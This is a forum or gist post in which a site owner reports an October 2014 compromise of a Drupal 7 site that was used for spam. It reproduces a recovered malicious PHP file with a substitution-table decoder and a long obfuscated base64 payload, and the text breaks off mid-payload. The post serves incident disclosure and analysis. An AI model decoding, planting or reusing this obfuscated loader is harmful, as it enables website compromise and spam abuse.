
@Strae
Created October 31, 2014 09:25
Drupal 7 attack october 2014
My host just blocked one of my Drupal 7 websites because it was being used for massive spam.
Analyzing my access log, I found two scripts that were being called often and that are not Drupal scripts:
/sites/all/modules/i18n/i18n_block/stats7.php
/modules/file/bs63d8.php
/sites/all/modules/i18n/i18n_block/stats7.php:
<?php
// Substitution table used by the decoder v5T7ETO(): every key is one alphanumeric
// character as it appears in the encoded payload, every value is the character it
// is swapped for before the result is base64-decoded. The file is kept exactly as
// recovered from the compromised site; only analysis comments are added.
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
/**
 * Decoder for the obfuscated payload (names are randomised; behaviour is simple).
 *
 * Walks the first argument one character at a time, replaces each character that
 * is a key of the second argument (the substitution table) with the mapped value,
 * leaves every other character as it is, and returns base64_decode() of the result.
 * The function only produces a string; nothing is executed here.
 */
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
// Encoded payload: one long string literal split into concatenated chunks of
// uneven length. It is not valid base64 until v5T7ETO() has applied the
// substitution table, so a plain base64 scan of the file does not reveal the code.
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'.
'A6DwMvdGxcqWbqPcqZDWBMnFD6EFhv7ChLiCQqaXGCbW7cAC7JMXBrMWxefwxcpZQd5XKwzWBMnRLiuXWgnYFrnRLnJFrnnXzmil'.
'WdaXWyiuqJyGxdwhIub0WeAZAbnZFCQZFcowPJGvq6zYOALXBuYfGbz4BZnFD6EFWcskKwNWjdApQyiEG6EFhvTlWyi'.
'EG6EoynApOdAlhCrEKAak7vbEFcowPJGvq6zYOALXBuYEBmQuzmMWxefwxcpZDcskKwzWGbJZSZzEy'.
'nUFrnJFQv6k7vnXzmilWdaXWyiuqJyGxdwhIub0WeAZAbnEynUFrAAC7g5ZFcowPJGvq6zYOALXBuYRLiuXWgnYFrnRLnJFrnAkD'.
'u5kA3b4VyiEG6EFQXxpQdblhJtZKAaW7Y5p7colWmiuKALEynUFrMMX7J5XO4rfBeekDug0BrzdzTNR'.
'Vwt4S4s2zZ6ZFZT2SPaRFTN4GrtZzMUFrMEFhX5kQvgC7rrEFcDp7JMkIegkImMX7J5XFMEF'.
'W6EFyAnXzmikjcIkjcIEFcnkFLruKY5p7ynZFPJZPXeGqdqEyiuFW6EFyMukQvbYWutZqcBvwwUFrMuoyiuoyiuFrAI'.
'XWcxkQTrcMq4wbwUFDbEFQXxpQdblhJtZOcskKwNWjdApQyiEynUFrAnXzrglWdaXWyiuqJyGxdwhIuAphqnpO4z'.
'WBMEFyMuGxZrZhAak7vbEFcowPJGvq6zYKgAphvaZAbnFrMuFwJBZFqnkjdAYFrMWxefwxcpZQxAkjdgX7vaZAbn'.
'FrMuFwJBZFqnkjdAYFrMWxefwxcpZQXIp7xaZAbnFrMuFwJBZFqnkjdAYFrMWxefwxcpZQxglhNAkD4zWBMEF'.
'BMEFW6EFyAA0KAbEFMUFrAJFriulhCiX7vbW7xgX7ASWjqxpjcAkxJ'.
'DkK4iEBMEFW6EFyAQpjuAChdiEFcowPJGvFegkImMl7vsZVb+ZFcLpjdbEyiuFW6EFyMuuqJyGxdwhIc9XWAYZVbrkjcIlWeS'.
'k7Ngk7gAkIrMkKJaYFMUFrMuoyiuoyiEFBcAphqnpO4rfBemYhsaXWunChNn0Qw'.
'iCQqaXGCbW7cAC7JMXBrMWxefwxcpZQvHChA6kIuYEBMUFrMMYKgAphvaZVbryOvtk7vIlhq6lWnAEKugk7w7dq'.
'JMXhd5XKwiuqJyGxdwhIublKvHXW4zWBMnRLiuuKxAkjdgX7vaZVbryOvtk7vIlhq'.
'6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxdwhIuHXWdaChYAkIuYEBMUFrMMXDu5pW4'.
'rfBemYhsaXWunChNn0QwiCQqaXGCbW7cAC7JMXBrMWxefwxcpZQXIp7xaZAbnEG6EFBcHChA6XWuaZVbryOvtk'.
'7vIlhq6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxdwhIuHChA6XWuaZAbn'.
'EG6EFBcgpKAgk7vaZVbryOvtk7vIlhq6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxd'.
'whIugpKAgk7vaZAbnEG6EFBcLCWdaXW4rfBemYhsaXWunChNn0QwiCQqaXGCbW7'.
'cAC7JMXBrMWxefwxcpZDegkjdAkIuYEBMUFriulhCilWdaXWyiuqJGcvuhcvZnEyiu0LiuFB'.
'cowbvBvMvBhIYyBqeowbv4czYYZVbrZz3zRImEFyMMWxdqwAXqwA6DwMvdGxcqWbqPc'.
'qZDWBmJZFZN4Skt4FTL2SPzRLiuFhAQEFqApWeb0BrMWxdqwAXqwA6DBqcwwqJCWb'.
'XfwAYewMcqcqJKGxZDWBMnFrMu0LiuFyMMWxdqwAXqwA6DBqcwwqJCWbXfwAYewMcqcqJKGxZDWBmJZ'.
'FZN4Skt4FTL2SPzRLiuFWbEFWbEFrAnXzgnkjdAYFrMWbXuGPvGEBMEFW6EFyAQpjuAChdiEFcocMA4cv4rCW4ruKHA0BmJ'.
'fzmMXQA6XBMEFyAUFrMuFBcQlhNApQqHXBmJZKq6YKvIW7xgCju5kIrMChNnCWdAkx6Ml7vsWBMUFrMuFBcQ'.
'lhNApQqHXBmJZKsxpvJHChdIpj4iuKXnpKvtChxAEG6EFyMuuKXnpKvtChxAZVbrYKvTYqJHChdIpj4iuKXnpKvtChxAEG6EFy'.
'MuuKXnpKvtChxAZVbr0KsxpvJHChdIpj4iuKXnpKvtChxAEG6EFyMuuqJKBwNqwx6Ml7vsWv6zpQqHXBuYZVbruKXnpK'.
'vtChxARLiuFWbEFWbEFrAnXzgApWeb0BrMXhxglhNaEBMEFW6EFyAA0KAbEFMUFrAJFriuXQJI'.
'XhqSlFmiuKvHChA6kIegkImMXDcAlhLrfGTruKvHChA6Eyiu0LiuFBcblKvHXBmJZFcblKvHXWdpCWuICWAokQqtXFrMYKgA'.
'phvaEvbUFrMuuOciXhxAZVbrChNbXWuophqSkQJaEFcblKvHXv6zYKgAphwzWBMUFrM'.
'uuOciXhxAZVbrpDvHW7xgCju5kIrMYKgAphwnRLiuFBcblKvHXBmJZOcA0Ocophq'.
'SkQJaEFcblKvHXBMUFrMuuOciXhxAZVbr0KsxpvJHChdIpj4iuOciXhxAEG6EFrMuuKxAk'.
'jdgX7wrfBmMphvak7qDXWdpCWuICWAokQqtXFrMphvak7qDXW4nWG6EFyMMphvak7qDXBmJZKq6YKvIW7xgCju5k'.
'IrMphvak7qDXv6zphvak7qDXBuYEG6EFyMMphvak7qDXBmJZKsxpvJHChdIpj4iuK'.
'xAkjdgX7wnRLiuFBcHXWdaChYAZVbrYKvTYqJHChdIpj4iuKxAkjdgX7wnRLiuFBcHXWdaChYAZVbr0Ksxp'.
'vJHChdIpj4iuKxAkjdgX7wnRLiuFB35uKxAkjdgX7wrfBeLCWdaW7xgCju5kIrMphvak7qDXBLruOegkjdAkI'.
'MUFrMuuKxAkjdgX7wrfBeQYKvnpqJHChdIpj4iuKxAkjdgX7w6ZFcQYKvnpFMUFriuFBcQkQJHZVbruKXIp7xa'.
'h7qIkQqsWjugpQyiuKXIp7xaEvbUFrMuuKXIp7brfBegpOcAkAJHChdIpj4iuKXIp7xpZQXIp7bzWBMUFrMuuKXIp7brfBetY'.
'hxophqSkQJaEFcQkQJHEG6EFyMMXDu5pBmJZOcA0OcophqSkQJaEFcQkQJHEG6EFyMMXDu5pBmJZ'.
'OgtYhxophqSkQJaEFcQkQJHEG6EFyMEFyAnXzmikjcIkjcIEFcQkQJH2FmzhbdvwxcfGv'.
'bzEBmJfBeKywNGcBMEFyAUFrMuFBcQkQJHZVbrXDu5pvJipjdbEFcQkQJHEG6EFyAJFrMuXhNaXyiuFW6EFyMuuKXI'.
'p7brfBeaYOuokQvLpKqSXBrzhbdvwxcfGvbz2FmzZzLruKXIp7bnRLiuFWbEFrMuuKxglhNAkzmJZFcHChA'.
'6XWuah7qIkQqsWjugpQyiuKxglhNAkD4nWG6EFrMuk7vtXqJHChA6EFcQkQJH2Fm'.
'MXhxglhL6ZFcblKvHXBLruKxAkjdgX7w6ZFcHChA6XWZnRLiuoynJFrnQYhsSYKA5pzeaXhsMW7xglhLiuKXIp7b'.
'6ZFcbpILruOdxCQi6ZFcbXWgb2FmMphqnpKvIEynUFzmrZFmMlKvgXFmJZFZzRLiEZF'.
'mrZFcxpzmJZOdbkDc5YWeLXWZiYhsnkhAMEOcnphwiEBMnRLiEZFmrZFciXhqMZFTJZFuKkQJHRzmMXDu5pvNtZS6EZFm'.
'rZFciXhqMZFTJZFuC2wxglhNAkSiruKxglhNAkANtZS6EZFmrZFciXhqMZFTJZFuBXWe'.
'60BxwpairuKXIp7xkpzZUFrirZFmruKgAChyr2SbrZMxnphwHvQ'.
'vIk7A5pSir4BTLWKTzRLirZFmruKgAChyr2SbrZMd5pDcApDyHvOALXGirpWv6YKALCWub27'.
'q6YKvIpQqblWXARIZUFzmrZFmMlKvgXFmtfBmzCQJxpQcgkDMJWFZH2BbH2BbH2BbHZzTMYhTtZALzWKskpzZUFzmrZFmE'.
'ZFmrZFcLpKqnpzmJZOdbkQALWjcgXj4iuOcA0OynRLirZFmruOngX'.
'ImJZFZH2BbH2BbH2BbH2Bbz2zcxpzTzWKsVp7sbXhsb2vcskKw1ZOcA0Oy5kKNglhTUZKdiCWuaXWyJ'.
'WFuuwb3HRVrxRBbNWFZUZKX5kQxgYVxQpKJjXhckpzZUFzmrZFmM0QqDZFTJZFuVp7sbXhsb2vc'.
'IChsaXQvI2wvtC7JMlhsDRzmjCQAbWKskpzZtuOe6ChAt2zukpANtZS6EZFmrZmirZFmruO'.
'ngXImtfBmz2BbH2BbH2BbH2BbHZzTMYhTtZANty7JtYKvtYFxw0WeA'.
'RzebXWgb27gbphLUZKdiCWuaXWyJWFuuwb3HRVrxRBbNWFZUWKTzRLirZFmruOngXImtfBmzy7JtYKvtYFx'.
'wkQqtk7XAkzxqpQd5XKAtXaird7unYqNtWKTMYKvTYqNtWKTzRLirZFmruOngXImtfBmz2BbH2BbH2BbH'.
'2BbHZzTMYhTtZzbHZS6EZFmrZmirZFmrlhCiC7JxpDyiuqJKBwNqwIMrfzmLEyirZFmr0LirZFmrZFmrZKX5kQvgC7riuqJKBwN'.
'qwIegkImMXQA6XBMEZFmrZFmrZFeUFzmrZFmrZFmrZFmrZKAQEKXnpKvoXWgnkjcaEFcQlhNAhIub'.
'pWeopQqHXBuYEBMEZFmrZFmrZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmruKCrfBeQpjeApzrMXQA6Xv6zYKxL'.
'W7sgphwzWBLrZDuzZzMUFzmrZFmrZFmrZFmrZFmrZFmM0QqDZFTJZFZH2BbH2BbH2BbH2Bbz2zcxpzTzWKTzRLirZFmrZ'.
'FmrZFmrZFmrZFmruOngXImtfBmzy7JtYKvtYFxw0WeARzegkOe6lhdgYKA5p'.
'zJ5CjcAYFxaYOuAChbUZS6EZFmrZFmrZFmrZFmrZFmrZFc1Chkr2SbrZQsgphwJWFZz2zcQlhNAhIutCh'.
'xAZAbtZALzWKTzRLirZFmrZFmrZFmrZFmrZFmruOngXImtfBmzy7JtYKvtYFxwkQqtk7XAkzxqpQd5XKAtXanzCW'.
'dAdSckpzZUFzmrZFmrZFmrZFmrZFmrZFmM0QqDZFTJZFuVp7sbXhsb2wcnkje5k7AblhJtRQqbYKqSlKxApDyU'.
'ZS6EZFmrZFmrZFmrZFmrZFmrZFc1Chkr2SbrZQXnpKvtChxAfvLzZzTMXQA6Xv6zpQqHXBuY2zukZANtWKT'.
'zRLirZFmrZFmrZFmrZFmrZFmruOngXImtfBeSlOvtlxJakKNnYFgzCWdAdScoXhs'.
'Sp7cAEKXIXhqMEFcQ2FeQlhNAk7A1XBrMXQA6Xv6zYKxLW7sgphwzWBMnEBMtZANt'.
'ZS6EZFmrZFmrZFmrZFmrZFmrZKXSpKJaXBrMXzMUFzmrZFmrZFmrZ'.
'FmrZObEZFmrZFmrZFeJFzmrZFeJFrirZFmrlhCiyKxglhLiuOc52F'.
'mMkjvzlzLruOngXILruKgAChynEyirZFmr0LirZFmrZFmrZKAQEFqApWeb0BrMWxefwx'.
'cpujXAkQu5k7wDWBMnFzmrZFmrZFmrZFmrZKvSlK3rZAdqGMcqcFZUFzmrZFeJFzm'.
'rZFeApOdAFzmrZFeUFzmrZFmrZFmrlhCiZhvHkOcsEFcowPJGvq6DYQvICQJaXBYYEBMEZFmrZFmrZFmrZFmrXh'.
'dipImzcMquGFZUFzmrZFeJFDbEFQXxpQdblhJtZKq6YKvIW7xgCju5kIrMC7JtYKvtYF'.
'ME0LirZFmrkOuAXxJHCWcSlqJgpKLiuIdUEFT8EWbSvhMD2FmMC7JtYKv'.
'tYFLruKxgYKdiXW4nRLiEZFmrZKX5kzrMlBmJZVmUZFcnZVLrC7JxpDyiuKxgYKdiXWdp4vbnRImMlB69EyirZFmr'.
'0LiEZFmrZFmrZFmMpD4rfBeA0Oe6p7cAEFu3ZzLruKxgYKdiXWdp4vxpuKAYEG6EZFmrZF'.
'mrZFmMCaZrfBeSpjvtYFrMpD4nRLirZFmrZFmrZFcIChsMZVbrkQqtXFrL2'.
'FmiuK4IZFbr4BMnRLirZFmrZFmrZFcSp7sbXhsbZVbrkjcIWjuAkKNgC7wiZD'.
'6z2zcHCWcSlKvahaqYhIcnWBTzoBZ6ZFctkx6MkQqtXqb6ZFcSp7sbXhsbEG6EZFmrZObEZFmrZOu'.
'AYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrYKvTYqJHChdIpj4iuKd5pDcApDynFD6EZFmrZOeIXhYophqbC7goChN6EFkS'.
'WqHwcvgwWFbihx61XKADlWy1Wvb9EvLHEqHpRQcnX7AbRAxYEIAkWB4D2FmMC7JtYKvtYFLruKxgYKdiXW4nRLiEZFmrZ'.
'KX5kzrMlBmJZVmUZFcnZVLrC7JxpDyiuKxgYKdiXWdp4qbnRImMlB69EyirZFmr0LirZFmrZFmrZFcHlhTrfBmMphqbC7'.
'gAkx6NWv6MlvbUFzmrZFmrZFmruKxg0FmJZFcHCWcSlKvahauYhIcnW'.
'G6EZFmrZFmrZFmMkQqtXFmJZOugpQyiuKxnpzLruKxg0FMUFzmrZ'.
'FmrZFmruOY5kQyrfBeDXhsAkQqbXvJjpjuMEFcIChsMEG6EFzmrZFmr'.
'ZFmruKd5pDcApDyrfBeLkQvDWjuAkKNgC7wiZz3z2DeIXhYokWv5YKwiuKxgYKdiXW'.
'dp4qxpuKAYEBTz2IZ6ZFcjpjuM2FmMC7JtYKvtYFLr4BMUFzmrZFeJFrirZF'.
'mrkOuAXxJHCWcSlqJgpKLiuIdkhxcqhqck2BgphanMlhYnYVnYWB6nWqbSuILruKd5pDcApDy6ZFcHCWcSlK'.
'vaEG6EFzmrZFeQpjZiuKMrfBmLRImMlBm3ZKd5YhsbEFcHCWcSlKvahaeYE'.
'G6ruKM9EIMEZFmrZO6EZFmrZFmrZFmMC7JxpDyrfBmMphqbC7gAkx6NWv6MlvbUFrirZFmrZFmrZFcjpjuMZFmJZKYApQvICWcAW'.
'jY5kQyiuKd5YhsbEG6EFzmrZFmrZFmruKd5pDcApDyrfBeLkQvDWjuAkKNgC7wiZz3z2DeIXhYokWv5YKwiuKxg'.
'YKdiXWdp4qxpuKAYEBTz2IZ6ZFcjpjuM2FmMC7JtYKvtYFLr4BMUFzmrZFeJFriEZFmrZOuAYOvIpzmMC7JtYKvtYV6E'.
'oyiEXDvtCjcnp7Tr0KsxpvJHChdIpj4iuKd5pDcApDynFD6EZFmrZOeIXhYophqbC7goChN6EFkSWqHRvwxk2BgphanMlhYnY'.
'VnYWB6nWqbSuILruKd5pDcApDy6ZFcHCWcSlKvaEG6EFzmrZFeQpjZiuKMrfBmLRI'.
'mMlBm3ZKd5YhsbEFcHCWcSlKvahaeYEG6ruKM9EIMEZFmrZO6EZFmrZFmrZFmMpDvHZVbru'.
'KxgYKdiXWdp4vxpuKAYRLirZFmrZFmrZFcHlhTrfBeLpjki4Gm6'.
'ZFctYhbr2BmNEG6EZFmrZFmrZFmMphqTZVbrkKJjEVPL2FmMpDvHEBmHZVPUFrirZFmrZFmrZFcIChsMZVbrkQqtXFrMphAt2F'.
'mMphqTEG6EZFmrZFmrZFmMC7JtYKvtYFmJZOdbkAJIXWe6ChdAEFcHCWcSlKvahaeYhIcnWBLruOugpQy6ZFcSp7sbXhsbEG6EZ'.
'FmrZObEZFmrZOuAYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrpD'.
'vHW7xgCju5kIrMC7JtYKvtYFME0LirZFmrkOuAXxJHCWcSlqJgpKL'.
'iuIdkhxueGMck2BgphanMlhYnYVnYWB6nWFbihx61XKADlWy1Wvb9EvNYZIk6ZFcSp7sbX'.
'hsb2FmMphqbC7gAkIMUFrirZFmrXQJIEFcnZVbr4V6ruKMrfFeSpjvtYFrMphqbC7gAkx6'.
'LWBMUZFcnEI6nFzmrZFeUFzmrZFmrZFmruKxnpzmJZFcHCWcSlKvah'.
'aqYhIcnWG6EZFmrZFmrZFmMphqTZVbruKxgYKdiXWdp4AxpuKAYR'.
'LirZFmrZFmrZFcIChsMZVbrkQqtXFrMphAt2FmMphqTEG6EZFmrZFmrZFmMC7JtYKvtYFmJZOdbkAJIXWe6ChdAEFcHCWcSlKv'.
'ahaeYhIcnWBLruOugpQy6ZFcSp7sbXhsbEG6EZFmrZObEZFmrZOuAYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrX7vtX'.
'WugYKvoY7JIXFrMpKvtXjciEynUFzmrZFmMC7ggkD4rfBmDChuSXKvQX7gnlQH6phs5kOqIkjcxYD'.
'AT0zkUFzmrZFmMpDvHy7ggkD4rfBeaYOu6XhTiuKdiCWuaEG6EZFmrZFcaYOunpQkrfBmDua6EZFm'.
'rZKX5kzrMlBmJZVmUZFcnZVLruKNApQYblV6ruKM9EIMEZFmrZO6EZFm'.
'rZFmrZFmMkjcIlhsDZFTJZOdxCDdbkzrMC7ggkD46ZOugpQyi4BLruKsxpwdiCWuaEBmHZVP6ZVPnRLirZFmroyirZFmrk'.
'QvbYWutZFcaYOunpQkUFDbEFQXxpQdblhJtZOegkjdophqSkQJaEFcSp7sbXhsb2FmMkKqak7vaEynUFzmrZFmMkKqakI'.
'mJZKqIkQqsWje5kFrMkKqak7vaEG6EZFmrZmirZFmrkQvbYWutZOdbkAJIXW'.
'e6ChdAEFupwPqGwxbz2FmMkKqakILruKd5pDcApDynRLnJFrnQYhsSYKA5pzeQYKvnpqJHChdIp'.
'j4iuKd5pDcApDy6ZFcQYKvnpFME0ImrZFmEZFmrZOuAYOvIpzeaYOuokQvLpKqSXBrzhbXwcwA4WBZ6ZFcQYKvn'.
'pFLruKd5pDcApDynRLnJFrnQYhsSYKA5pzenkxJnkFrMkjcIEBeUFzm'.
'rkQvbYWutZOeIXhYophqbC7riZzJ0Eq6N2GAYoq6N2GAYhamHRvx34v6L2GAYhamHRvx34A6L2GcYhamHRvx3'.
'4Svp4FbxWBMiWFTihamHRvx3haPHRvxp4FbsWWLNhamHRvxp4FbsWWLIhamHdqxp4FbsWWLIdv6L2GvYEBAU4jbM2IZ6uOdbkzM'.
'UFDbEFQXxpQdblhJtZKXIp7xolKJaYFrMC7JtYKvtYFME0LiEZFm'.
'rZFcipjdbZVbrkOuAXxJIXWe6ChdAEFk5WzgjYjY3XDcLEvLt27MD2FkD2PmMWxdqwAXqwA6D'.
'BqcwwqJZGxdwuxbnRLiEZFmrZKAQZFgnkxJnkFrMlKJaYFMnFz'.
'mrZFeUFzmrZFmrZFmrkQvbYWutZFcSp7sbXhsbRLirZFmroyirZFmrFzmrZFmMYKJ9XhsaZVbrXWgLpKJMXB'.
'rzyFZ6ZFcSp7sbXhsbEG6EFzmrZFmMC7JtYKvtYFmJZFcbp7HApDdp4qbr2zmz'.
'yFZr2zmMlKJaYFmtZFZ+ZS6EFzmrZFeIXWcxkQTruKd5pDcApD'.
'yUFDbEFQXxpQdblhJtZKvIkQJIWayLdFrnFD6EFhgAChcAkzrzBqcwwF3N2SPrdVmbZPs5YFeKpjvtXFZnRLiEFBcx'.
'kQMrfBeLkQvDWjuAkKNgC7wiuI3iWV3n2ziM2Ik6ZFkD2FmMWxdqwAXqwA6D'.
'wMvcvwvGvqJvwMMDWBmnRLiEFBcSp7sbXhsbZVbrCjvaYKJHW7gbYOeokQvNYhvaYVPiZQgbYOm12I3z2zcowbvBvMvBhIYZvqcy'.
'WbgfwxyDWBTz2bqKwhnVGMgtlVgBYOcKBGdhGWuFXKcXYaXIpQY20SY2cwPzEG6EFBcSp7sbXhsbZVbrkjcIWjuAkKNg'.
'C7wiZFZ5ywXclMdRBKsiRqubYPXu4xXdkMuMXqAjdDutXbH1dbHqyBZ6ZFcxkQM6ZFcSp7sbXhsbZFMUFriuXWgnYFrruKd'.
'5pDcApDyrEG6EoyiEFQXxpQdblhJtZKdxkjc5pvJiYOcLWjuAkWvAkjyNEFcLCWugpW4nFD6EZFmrZKAQEFmgZKAa'.
'W7qIkQqsEFcLCWugpW4nZFMEZFmrZO6EZFmrZFmrZFmMkKqIChxaZV'.
'brCWuICWMiFzmrZFmrZFmrZFmrZFYxkQLDZVb+ZFcLCWugpW46F'.
'zmrZFmrZFmrZFmrZFYHXWcip7yDZVb+ZFYOcvyDFzmrZFmrZFmrEG6EZF'.
'mrZObEZFmrZmirZFmrlhCiZFcLCWugpWdpujvIpFYYfGbDuImnZOuAYOvIpz'.
'eKywNGcG6EZFmrZmirZFmrlhCiZFPrlWdaXWyiuOegkQqHkx6Dphv'.
'blKJMuxbnZFMruOegkQqHkx6DphvblKJMuxbrfBmilWdaXWyiuO'.
'egkQqHkx6DXKqbCBYYEBCQlWdoCWuICWMiuOegkQqHkx6DXKqbCBYYEBMrfImDwPJGvFkrRzmDcbvwua6EZFmrZFcLCWugpWdpu7'.
'xAYKg5XFYYZVbrkjcIYKJxkOeAkzrMkKqIChxahIYHXWcip7yDWBMUFzmrZFenXzrrZ'.
'BenpAJgkDug0BrMkKqIChxahIYHXWcip7yDWBLrCWuICWMiubYqvFk6ZFYyGxdwuIMnZF'.
'MrkQvbYWutZPXeGqdqRImEZFmrZmirZFmr2Iirbu/crdFTb22y5HFbb2Sy5FVcrYKebC5ytJF1bC4rb'.
'2Zrb2/crdFLb22ytdFUbCay5YK2b2Mrb22ytdFbZFi5FzmrZFmMYWu6ZVbrkKqIk7voYWu6EF'.
'cLCWugpWdpujvIpFYYEG6EZFmrZKAQEFmgZKAak7vbEFcxkQNpujdSlKvH'.
'XBYYEBmnZFcxkQNpujdSlKvHXBYYZVbru7gbYOmDRLirZFmrlhCiZFPrlWdaXWyiuOvIpq6DkKqblFYYEBmnZF'.
'cxkQNpujegYKrDWBmJZFk5ua6EZFmrZKAQEFmgZKAak7vbEFcxkQNp'.
'u7g5kjyDWBMruzCrlWdaXWyiuOvIpq6DkKqblFYYEBmnFzmrZFeUFzmrZFmrZFmrl'.
'hCiZOdbkDe5kIrMYWu6hIYLCWciuxb6ZFk5uIMrEyirZFmrZFmrZO6EZFmrZFmrZFmrZFmruOvIpq6DlKJaYFYYZVb'.
'rkjvzkjcIEFcxkQNpujegYKrDWBLr4FLrkjcIkKJaEFcxkQNpujegYKrDWB'.
'LruI3DEBMUFzmrZFmrZFmrZFmrZFcxkQNpujegYKrDWBmJZOdxCDdbkzrMYWu6hIYLCWciuxb6ZOdbkDe5kIrMYWu6hIY'.
'LCWciuxb6ZFk5uIMnRLirZFmrZFmrZObEZFmrZFmrZFeApOdAFzmrZFmrZFmr0LirZFmrZFmrZFmrZFmMYWu6hIYipj'.
'dbuxbrfBmMYWu6hIYLCWciuxbUFzmrZFmrZFmrZFmrZFcxkQNpujegYKrDWBmJZFk5ua6uF'.
'zmrZFmrZFmroyirZFmroyirZFmruOvIpq6DkKqblFYYZVbrkOuAXxJIXWe6ChdAEFZ5hxNk2xb92IZ6ZF'.
'Z5ZzLruOvIpq6DkKqblFYYEG6EZFmrZKAQEFenkjdAYFrMYWu6hIYNYhvI0BYYEBm'.
'nZFcxkQNpujegYKrDWBmtfBmzfj6MYWu6hIYNYhvI0BYYoBZUFzmrZFmEZFmrZFcLpjubZVbrlWdaX'.
'WyiuOegkQqHkx6DkKJIYFYYEBm/ZFcLCWugpWdpuje5kDyDWyirZFmrZFm'.
'rZFmrZFm1ZFrrlWdaXWyiuOvIpq6DkKJIYFYYEBm/ZFcxkQNpuje5kDyDWBm1ZFrMYWu6hIYaC7'.
'gAphwDWGbJu7gbYOeaua3bdV41RVmnZFMUFzmrZFmEZFmrZFcblhxApjv'.
'bZVbrlWdaXWyiuOegkQqHkx6DYKAHXhJxYFYYEBm/ZFcLCWugpWdpujcnphv5YWyDWBm1ZV4LRLirZFmrlhCiZFPrl'.
'WdaXWyiuOegkQqHkx6DkQvbYWutuxbnZFMruOegkQqHkx6DkQvbYWutuxbrfBmDC7J'.
'tYKvtYFkUFzmrZFmEZFmrZFcaC7gAphwrfBmMYWu6hIYaC7gAphwDWGbJu7gbYOeauIm/ZFYak7L12I3DRzkDR'.
'LirZFmruKXLZVbryKXap7d9pjeApzrMk7diXhxA2zcxkQNpu7g5kjy'.
'DWBLruOe5kDy6ZFcAkDutpILruKvIkDdbkzLruOcnphv5YWynRLirZF'.
'mrlhCiZFcQkFmnFzmrZFeUFzmrZFmrZFmr2IirGhJ1lhN6CBm82LirZFmrZFmrZKAQEFmgZKAak'.
'7vbEFcLCWugpWdpuxvaXWZHyhYApDyDWBMrEBmMkKqIChxahIYvk7vI2wqDXhsbuxbrfBmzGhJ1'.
'lhN6CB3x2SmrEKAylKJtXG6rvG6ryxevZKAylKJtXBefwImaWamrpKA9XBedCh4rGx4rhV6rXhTHYW4nZ'.
'PqLkKNAv7vzB7Ab2awIRFTNRFmiBbgwGwL6ZKNnl7wrc7vSl73nZqXAkDdnp7T5dFT'.
'LZPx5CQA6XB3jyG4b4BeGChXgkQM5dGZT2SP7ZS6EZFmrZFmrZFmEZFmrZFmrZFmMkQvNYhvaYFmJZF'.
'uUuOegkQqHkx6DphvblKJMuxxJZO6MYWu6hIYLCWciuxxJZPgwvqm54BTLW'.
'OukpzZUFzmrZFmrZFmruOuAkWvAkjyr2SbrZMg5kjy1ZO6MYWu6hIYipjdbuxxJWOukpzZUFzmrZFmrZFm'.
'ruOuAkWvAkjyr2SbrZAvaXWZHyhYApDy1ZO6MkKqIChxahIYvk7vI2wqDXhsbux'.
'xJZzTzWOukpzZUFzmrZFmrZFmrlhCiZKAak7vbEFcLCWugpWdpujuAXQvIXWZDWBMrEBmMk'.
'QvNYhvaYFmtfBmzwQvQXWuAkSir0IcLCWugpWdpujuAXQvIXWZDWWxkkANtZS6EZFmrZFmrZFenXz'.
'rrlWdaXWyiuOegkQqHkx6DC7J5l7AAuxbnZFMEZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFcSp7J9lhwrfBmzZS6EZFm'.
'rZFmrZFmrZFmrlhCiZKAaW7qIkQqsEFcLCWugpWdpu7d5p7HnXBYYEBmnZOHQpjuAChd'.
'iEFmMkKqIChxahIYSp7J9lhwDWBegkImMlab+uOCrEBmMC7J5l7AAZFTJZFZMlabMYS6rZS6ruKd5p7H'.
'nXBmJZOdxCDdbkzrMC7J5l7AA2Vm62GZnRjbEZFmrZFmrZFmrZFmrXhNaXBmMC7J5l7AAZ'.
'VbruOegkQqHkx6DC7J5l7AAuxbUFzmrZFmrZFmrZFmrZKAQEFmMC7J5l7AAZGbDuImnZFcIXWqxXWdbZFTJZFuVp7J9lhw1ZFcSp'.
'7J9lhvkkANtZS6EZFmrZFmrZFeJFzmrZFmrZFmruOuAkWvAkjyr2SbrZMd5pQsACjcnp7T1ZKd6pjdAWOukpz'.
'ZUFzmrZFmrZFmrlhCiZFcLCWugpWdpu7xAYKg5XFYYfGbDwPJGvFkrEyirZFmrZFmrZO6EZFmrZFmrZFmrZFmrlh'.
'CiZKAak7vbEFcLCWugpWdpu7cgYKPDWBMruzCrlWdoCWuICWMiuOegkQqHkx6DXKqbCBYYEBmnFzmrZ'.
